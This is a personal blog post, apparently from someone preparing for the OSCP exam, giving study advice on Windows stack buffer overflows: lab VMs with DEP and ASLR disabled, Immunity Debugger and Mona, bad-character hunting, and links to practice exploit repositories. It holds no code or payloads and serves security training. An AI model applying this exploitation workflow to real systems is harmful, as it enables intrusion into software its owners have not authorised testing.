Buffer Overflows – learn to love assembly and hex.
Before my PWK lab time I started, I spent three weeks working on buffer overflows. Luckily, I learned a little ASM (Turbo ASM!!!!) many a year ago. I learned a little more in college, but that was a hot minute ago.
But for three weeks I decided to jump into the thing that scares a lot of people but is very easy to master at the level required for the exam. The BOF is the “free points” of the exam.
My best advice, grab an evaluation copy of Windows 7 32-bit and/or WinXP or Server 2003 and spin up a VM. Install Immunity Debugger, Mona, some vulnerable software, and start exploiting.
If you’re using a Windows 7 VM you’ll want to disable DEP and ASLR. There’s a few ways to do it including changing some registry keys, but my approach was to use Microsoft’s Enhanced Mitigation Experience Toolkit (EMET). Also be warned that often something vulnerable on XP/2003 won’t work on 7 because the JMP ESP addresses will contain bad characters.
A big help to me, after I watched some videos and started to remember exactly how the stack works was to run through a bunch of the vulnerable programs on https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice Freddie’s skeleton exploits, half done exploits, etc all helped me get through each stage.
But before you jump into half done things, learn the process from start to finish. Highly recommended and for good reason is Georgia Weidman’s course on Cybrary and also her book. A little birdie told me she’s coming out with a new edition of the book and I’ll tots buy it.
Start polishing your skills or just start out doing things well by checking out dostackbufferoverflowgood and going through the PDF. Justinsteven does an excellent job on explaining things and helping you learn some tricks that will make doing a BOF easier.
So what you’ll need to know for the exam – do the buffer overflow in the course materials, do a bunch more. Be able to run through it start to finish in an hour. You’ll hear a lot of “watch out for bad characters” advice, so learn how to identify them and also learn what sort of services have special characters that have a purpose. An FTP server probably has different bad characters than an email address. Read the RFCs for both. But definitely learn how to identify bad characters the old fashioned way and think of some new and creative ways to identify them. If you’re almost all the way through an array and you have 25 bad characters then you’re doing something wrong, start over.
Now, don’t do what Danny Don’t Do does – I got very proficient at BOFs before my PWK lab time started and touched them twice after my lab time started. After three months, I got a little rusty. That easy 25 points in an hour turned into three hours for me and was slightly de-motivating. Stay sharp. Stay frosty.
And in case you want to see some fine examples of really poor coding and even worse project management check out the exploits I wrote/modified: https://gitlab.com/darkestofdans/win32-buffer-overflow-practice
OSCP pro tip: Learn to use git. Make a private repository. Part of the reporting for OSCP is showing what changes you made to an exploit, git makes that easy by committing the changes and viewing the differences.